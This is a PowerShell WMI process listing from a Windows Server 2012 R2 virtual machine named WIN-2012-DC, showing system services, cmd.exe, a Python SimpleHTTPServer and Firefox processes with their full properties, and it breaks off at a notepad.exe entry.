PSComputerName : WIN-2012-DC ProcessName : ismserv.exe Handles : 88 VM : 26324992 WS : 839680 Path : C:\Windows\System32\ismserv.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1700" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1700" Caption : wlms.exe CommandLine : C:\Windows\system32\wlms\wlms.exe CreationClassName : Win32_Process CreationDate : 20170712121451.074083-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : wlms.exe ExecutablePath : C:\Windows\system32\wlms\wlms.exe ExecutionState : Handle : 1700 HandleCount : 39 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wlms.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 47 OtherTransferCount : 178 PageFaults : 1068 PageFileUsage : 484 ParentProcessId : 440 PeakPageFileUsage : 576 PeakVirtualSize : 15691776 PeakWorkingSetSize : 2620 Priority : 8 PrivatePageCount : 495616 ProcessId : 1700 QuotaNonPagedPoolUsage : 4 QuotaPagedPoolUsage : 29 QuotaPeakNonPagedPoolUsage : 5 QuotaPeakPagedPoolUsage : 29 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 14626816 WindowsVersion : 6.3.9600 WorkingSetSize : 1306624 WriteOperationCount : 42 WriteTransferCount : 1080 PSComputerName : WIN-2012-DC ProcessName : wlms.exe Handles : 39 VM : 14626816 WS : 1306624 Path : C:\Windows\system32\wlms\wlms.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1708" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1708" Caption : dfssvc.exe CommandLine : C:\Windows\system32\dfssvc.exe CreationClassName : Win32_Process CreationDate : 20170712121451.112485-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : dfssvc.exe ExecutablePath : C:\Windows\system32\dfssvc.exe ExecutionState : Handle : 1708 HandleCount : 129 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : dfssvc.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 421 OtherTransferCount : 10160 PageFaults : 2123 PageFileUsage : 1912 ParentProcessId : 440 PeakPageFileUsage : 2068 PeakVirtualSize : 32190464 PeakWorkingSetSize : 5000 Priority : 8 PrivatePageCount : 1957888 ProcessId : 1708 QuotaNonPagedPoolUsage : 13 QuotaPagedPoolUsage : 48 QuotaPeakNonPagedPoolUsage : 15 QuotaPeakPagedPoolUsage : 48 ReadOperationCount : 15 ReadTransferCount : 3374 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 0 VirtualSize : 30593024 WindowsVersion : 6.3.9600 WorkingSetSize : 2871296 WriteOperationCount : 14 WriteTransferCount : 6034 PSComputerName : WIN-2012-DC ProcessName : dfssvc.exe Handles : 129 VM : 30593024 WS : 2871296 Path : C:\Windows\system32\dfssvc.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1316" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1316" Caption : vds.exe CommandLine : C:\Windows\System32\vds.exe CreationClassName : Win32_Process CreationDate : 20170712121512.030634-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : vds.exe ExecutablePath : C:\Windows\System32\vds.exe ExecutionState : Handle : 1316 HandleCount : 158 InstallDate : KernelModeTime : 625000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : vds.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 841 OtherTransferCount : 28175 PageFaults : 2770 PageFileUsage : 1772 ParentProcessId : 440 PeakPageFileUsage : 2152 PeakVirtualSize : 48394240 PeakWorkingSetSize : 7856 Priority : 8 PrivatePageCount : 1814528 ProcessId : 1316 QuotaNonPagedPoolUsage : 16 QuotaPagedPoolUsage : 88 QuotaPeakNonPagedPoolUsage : 19 QuotaPeakPagedPoolUsage : 92 ReadOperationCount : 32 ReadTransferCount : 94208 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 156250 VirtualSize : 45608960 WindowsVersion : 6.3.9600 WorkingSetSize : 512000 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : vds.exe Handles : 158 VM : 45608960 WS : 512000 Path : C:\Windows\System32\vds.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1248" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1248" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k termsvcs CreationClassName : Win32_Process CreationDate : 20170712121512.705767-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 1248 HandleCount : 401 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 261 OtherTransferCount : 808 PageFaults : 3772 PageFileUsage : 3432 ParentProcessId : 440 PeakPageFileUsage : 3548 PeakVirtualSize : 76869632 PeakWorkingSetSize : 7380 Priority : 8 PrivatePageCount : 3514368 ProcessId : 1248 QuotaNonPagedPoolUsage : 19 QuotaPagedPoolUsage : 151 QuotaPeakNonPagedPoolUsage : 19 QuotaPeakPagedPoolUsage : 154 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 22 UserModeTime : 781250 VirtualSize : 75804672 WindowsVersion : 6.3.9600 WorkingSetSize : 2723840 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 401 VM : 75804672 WS : 2723840 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1336" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1336" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712121512.750613-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1336 HandleCount : 107 InstallDate : KernelModeTime : 1250000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1377 OtherTransferCount : 71686 PageFaults : 1988 PageFileUsage : 1004 ParentProcessId : 440 PeakPageFileUsage : 1204 PeakVirtualSize : 22446080 PeakWorkingSetSize : 4368 Priority : 8 PrivatePageCount : 1028096 ProcessId : 1336 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 46 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 46 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 3 UserModeTime : 156250 VirtualSize : 21381120 WindowsVersion : 6.3.9600 WorkingSetSize : 1564672 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 107 VM : 21381120 WS : 1564672 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2060" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="2060" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712121512.780955-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 2060 HandleCount : 261 InstallDate : KernelModeTime : 625000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1484 OtherTransferCount : 33964 PageFaults : 6573 PageFileUsage : 7724 ParentProcessId : 440 PeakPageFileUsage : 11332 PeakVirtualSize : 1166675968 PeakWorkingSetSize : 12516 Priority : 8 PrivatePageCount : 7909376 ProcessId : 2060 QuotaNonPagedPoolUsage : 18 QuotaPagedPoolUsage : 126 QuotaPeakNonPagedPoolUsage : 19 QuotaPeakPagedPoolUsage : 127 ReadOperationCount : 308 ReadTransferCount : 12500992 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 0 VirtualSize : 628494336 WindowsVersion : 6.3.9600 WorkingSetSize : 3321856 WriteOperationCount : 296 WriteTransferCount : 1810432 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 261 VM : 628494336 WS : 3321856 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2600" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="2600" Caption : msdtc.exe CommandLine : C:\Windows\System32\msdtc.exe CreationClassName : Win32_Process CreationDate : 20170712121711.180176-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : msdtc.exe ExecutablePath : C:\Windows\System32\msdtc.exe ExecutionState : Handle : 2600 HandleCount : 158 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : msdtc.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 158 OtherTransferCount : 274 PageFaults : 2084 PageFileUsage : 2312 ParentProcessId : 440 PeakPageFileUsage : 2480 PeakVirtualSize : 42795008 PeakWorkingSetSize : 6812 Priority : 8 PrivatePageCount : 2367488 ProcessId : 2600 QuotaNonPagedPoolUsage : 12 QuotaPagedPoolUsage : 74 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 74 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 0 VirtualSize : 41689088 WindowsVersion : 6.3.9600 WorkingSetSize : 413696 WriteOperationCount : 3 WriteTransferCount : 1286144 PSComputerName : WIN-2012-DC ProcessName : msdtc.exe Handles : 158 VM : 41689088 WS : 413696 Path : C:\Windows\System32\msdtc.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="260" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="260" Caption : taskhostex.exe CommandLine : taskhostex.exe CreationClassName : Win32_Process CreationDate : 20170712145926.030215-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : taskhostex.exe ExecutablePath : C:\Windows\system32\taskhostex.exe ExecutionState : Handle : 260 HandleCount : 195 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : taskhostex.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 745 OtherTransferCount : 10612 PageFaults : 2471 PageFileUsage : 2676 ParentProcessId : 868 PeakPageFileUsage : 3172 PeakVirtualSize : 232296448 PeakWorkingSetSize : 7600 Priority : 8 PrivatePageCount : 2740224 ProcessId : 260 QuotaNonPagedPoolUsage : 17 QuotaPagedPoolUsage : 168 QuotaPeakNonPagedPoolUsage : 21 QuotaPeakPagedPoolUsage : 170 ReadOperationCount : 27 ReadTransferCount : 1724416 SessionId : 1 Status : TerminationDate : ThreadCount : 5 UserModeTime : 156250 VirtualSize : 230174720 WindowsVersion : 6.3.9600 WorkingSetSize : 7581696 WriteOperationCount : 43 WriteTransferCount : 835584 PSComputerName : WIN-2012-DC ProcessName : taskhostex.exe Handles : 195 VM : 230174720 WS : 7581696 Path : C:\Windows\system32\taskhostex.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1188" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1188" Caption : explorer.exe CommandLine : C:\Windows\Explorer.EXE CreationClassName : Win32_Process CreationDate : 20170712145926.061690-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : explorer.exe ExecutablePath : C:\Windows\Explorer.EXE ExecutionState : Handle : 1188 HandleCount : 1199 InstallDate : KernelModeTime : 166875000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : explorer.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 37916 OtherTransferCount : 959574 PageFaults : 147573 PageFileUsage : 36700 ParentProcessId : 1860 PeakPageFileUsage : 48264 PeakVirtualSize : 588001280 PeakWorkingSetSize : 91248 Priority : 8 PrivatePageCount : 37580800 ProcessId : 1188 QuotaNonPagedPoolUsage : 66 QuotaPagedPoolUsage : 1044 QuotaPeakNonPagedPoolUsage : 95 QuotaPeakPagedPoolUsage : 1189 ReadOperationCount : 2784 ReadTransferCount : 3005114 SessionId : 1 Status : TerminationDate : ThreadCount : 39 UserModeTime : 78437500 VirtualSize : 507023360 WindowsVersion : 6.3.9600 WorkingSetSize : 74444800 WriteOperationCount : 151 WriteTransferCount : 25552 PSComputerName : WIN-2012-DC ProcessName : explorer.exe Handles : 1199 VM : 507023360 WS : 74444800 Path : C:\Windows\Explorer.EXE __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3492" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3492" Caption : VBoxTray.exe CommandLine : "C:\Windows\System32\VBoxTray.exe" CreationClassName : Win32_Process CreationDate : 20170712145937.014436-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : VBoxTray.exe ExecutablePath : C:\Windows\System32\VBoxTray.exe ExecutionState : Handle : 3492 HandleCount : 175 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : VBoxTray.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 17572 OtherTransferCount : 134264 PageFaults : 7529 PageFileUsage : 1680 ParentProcessId : 1188 PeakPageFileUsage : 1796 PeakVirtualSize : 89497600 PeakWorkingSetSize : 6160 Priority : 8 PrivatePageCount : 1720320 ProcessId : 3492 QuotaNonPagedPoolUsage : 12 QuotaPagedPoolUsage : 152 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 153 ReadOperationCount : 2678 ReadTransferCount : 21424 SessionId : 1 Status : TerminationDate : ThreadCount : 10 UserModeTime : 0 VirtualSize : 85270528 WindowsVersion : 6.3.9600 WorkingSetSize : 6270976 WriteOperationCount : 1339 WriteTransferCount : 5356 PSComputerName : WIN-2012-DC ProcessName : VBoxTray.exe Handles : 175 VM : 85270528 WS : 6270976 Path : C:\Windows\System32\VBoxTray.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3944" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3944" Caption : cmd.exe CommandLine : "C:\Windows\system32\cmd.exe" CreationClassName : Win32_Process CreationDate : 20170712151804.014863-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : cmd.exe ExecutablePath : C:\Windows\system32\cmd.exe ExecutionState : Handle : 3944 HandleCount : 31 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : cmd.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 226 OtherTransferCount : 3268 PageFaults : 634 PageFileUsage : 1516 ParentProcessId : 1188 PeakPageFileUsage : 2612 PeakVirtualSize : 13705216 PeakWorkingSetSize : 2184 Priority : 8 PrivatePageCount : 1552384 ProcessId : 3944 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 24 QuotaPeakNonPagedPoolUsage : 4 QuotaPeakPagedPoolUsage : 25 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 0 VirtualSize : 12517376 WindowsVersion : 6.3.9600 WorkingSetSize : 2215936 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : cmd.exe Handles : 31 VM : 12517376 WS : 2215936 Path : C:\Windows\system32\cmd.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3120" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3120" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe 0x4 CreationClassName : Win32_Process CreationDate : 20170712151804.031029-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 3120 HandleCount : 57 InstallDate : KernelModeTime : 312500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 271 OtherTransferCount : 12671 PageFaults : 1915 PageFileUsage : 1012 ParentProcessId : 3944 PeakPageFileUsage : 1128 PeakVirtualSize : 62922752 PeakWorkingSetSize : 6096 Priority : 8 PrivatePageCount : 1036288 ProcessId : 3120 QuotaNonPagedPoolUsage : 7 QuotaPagedPoolUsage : 107 QuotaPeakNonPagedPoolUsage : 8 QuotaPeakPagedPoolUsage : 125 ReadOperationCount : 11 ReadTransferCount : 452 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 53530624 WindowsVersion : 6.3.9600 WorkingSetSize : 5320704 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : conhost.exe Handles : 57 VM : 53530624 WS : 5320704 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3832" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3832" Caption : python.exe CommandLine : python -m SimpleHTTPServer CreationClassName : Win32_Process CreationDate : 20170712151820.171032-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : python.exe ExecutablePath : C:\Python27\python.exe ExecutionState : Handle : 3832 HandleCount : 162 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : python.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 13025 OtherTransferCount : 225557 PageFaults : 2794 PageFileUsage : 5664 ParentProcessId : 3944 PeakPageFileUsage : 5816 PeakVirtualSize : 88002560 PeakWorkingSetSize : 10712 Priority : 8 PrivatePageCount : 5799936 ProcessId : 3832 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 146 QuotaPeakNonPagedPoolUsage : 29 QuotaPeakPagedPoolUsage : 146 ReadOperationCount : 218 ReadTransferCount : 883050 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 937500 VirtualSize : 83390464 WindowsVersion : 6.3.9600 WorkingSetSize : 10915840 WriteOperationCount : 42 WriteTransferCount : 983 PSComputerName : WIN-2012-DC ProcessName : python.exe Handles : 162 VM : 83390464 WS : 10915840 Path : C:\Python27\python.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3116" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3116" Caption : firefox.exe CommandLine : "C:\Program Files\Mozilla Firefox\firefox.exe" CreationClassName : Win32_Process CreationDate : 20170712152444.358480-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : firefox.exe ExecutablePath : C:\Program Files\Mozilla Firefox\firefox.exe ExecutionState : Handle : 3116 HandleCount : 745 InstallDate : KernelModeTime : 16875000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : firefox.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 30643 OtherTransferCount : 536836 PageFaults : 827850 PageFileUsage : 141292 ParentProcessId : 1188 PeakPageFileUsage : 180008 PeakVirtualSize : 1768960000 PeakWorkingSetSize : 218196 Priority : 8 PrivatePageCount : 144683008 ProcessId : 3116 QuotaNonPagedPoolUsage : 62 QuotaPagedPoolUsage : 607 QuotaPeakNonPagedPoolUsage : 87 QuotaPeakPagedPoolUsage : 731 ReadOperationCount : 4966 ReadTransferCount : 249050437 SessionId : 1 Status : TerminationDate : ThreadCount : 42 UserModeTime : 86718750 VirtualSize : 1681330176 WindowsVersion : 6.3.9600 WorkingSetSize : 198397952 WriteOperationCount : 318221 WriteTransferCount : 80063549 PSComputerName : WIN-2012-DC ProcessName : firefox.exe Handles : 745 VM : 1681330176 WS : 198397952 Path : C:\Program Files\Mozilla Firefox\firefox.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2992" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="2992" Caption : firefox.exe CommandLine : "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.0.1418504536\2120526436" -childID 1 -isForBrowser -intPrefs 5:50|6:-1|28:1000|33:20|34:10|43:128| 44:10000|48:0|50:400|51:1|52:0|53:0|58:0|59:120|60:120|133:2|134:1|147:5000|157:0|159:0|170:10000|182:-1|187:128|188:10000|189:0|195:24|196:32768|198:0|199:0|207:5|211:10485 76|212:100|213:5000|215:600|217:1|226:1|231:0|241:60000| -boolPrefs 1:0|2:0|4:0|26:1|27:1|30:0|35:1|36:0|37:0|38:0|39:1|40:0|41:1|42:1|45:0|46:0|47:0|49:0|54:1|55:1|56:0|57: 1|61:1|62:1|63:0|64:1|65:1|66:0|67:1|70:0|71:0|74:1|75:1|79:1|80:1|81:0|82:0|84:0|85:0|86:1|87:0|90:0|91:1|92:1|93:1|94:1|95:1|96:0|97:0|98:1|99:0|100:0|101:0|102:1|103:1|10 4:0|105:1|106:1|107:0|108:0|109:1|110:1|111:1|112:0|113:1|114:1|115:1|116:1|117:1|118:1|119:1|120:1|122:0|123:0|124:0|125:1|126:0|127:1|131:1|132:1|135:1|136:0|141:0|146:0|1 49:1|152:1|154:1|158:0|161:1|164:1|165:1|171:0|172:0|173:1|175:0|181:0|183:1|184:0|185:0|186:0|193:0|194:0|197:1|200:0|202:0|204:1|205:0|210:0|214:1|219:0|220:0|221:0|222:1| 224:1|225:1|228:0|233:0|234:0|235:1|236:1|237:0|238:1|239:1|240:0|242:0|243:0|245:0|253:1|254:1|255:0|256:0|257:0| -stringPrefs "3:7;release|174:3;1.0|191:332; ¼½¾!???:????? %???????? ???????-’·?????????‹›?/???????????????/:?????????????????? ???????????????????./???????|192:8;moderate|227:38;{d130b7e4-5618-427c-891a-ee8a0888c2a8}|" -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" 3116 "\\.\pipe\gecko-crash-server-pipe.3116" tab CreationClassName : Win32_Process CreationDate : 20170712152446.155540-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : firefox.exe ExecutablePath : C:\Program Files\Mozilla Firefox\firefox.exe ExecutionState : Handle : 2992 HandleCount : 286 InstallDate : KernelModeTime : 2812500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : firefox.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 976 OtherTransferCount : 12866 PageFaults : 37617 PageFileUsage : 34096 ParentProcessId : 3116 PeakPageFileUsage : 44108 PeakVirtualSize : 1400070144 PeakWorkingSetSize : 82424 Priority : 8 PrivatePageCount : 34914304 ProcessId : 2992 QuotaNonPagedPoolUsage : 30 QuotaPagedPoolUsage : 454 QuotaPeakNonPagedPoolUsage : 32 QuotaPeakPagedPoolUsage : 474 ReadOperationCount : 3950 ReadTransferCount : 70436713 SessionId : 1 Status : TerminationDate : ThreadCount : 17 UserModeTime : 6875000 VirtualSize : 1378304000 WindowsVersion : 6.3.9600 WorkingSetSize : 72286208 WriteOperationCount : 2307 WriteTransferCount : 487820 PSComputerName : WIN-2012-DC ProcessName : firefox.exe Handles : 286 VM : 1378304000 WS : 72286208 Path : C:\Program Files\Mozilla Firefox\firefox.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="956" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="956" Caption : notepad.exe CommandLine : 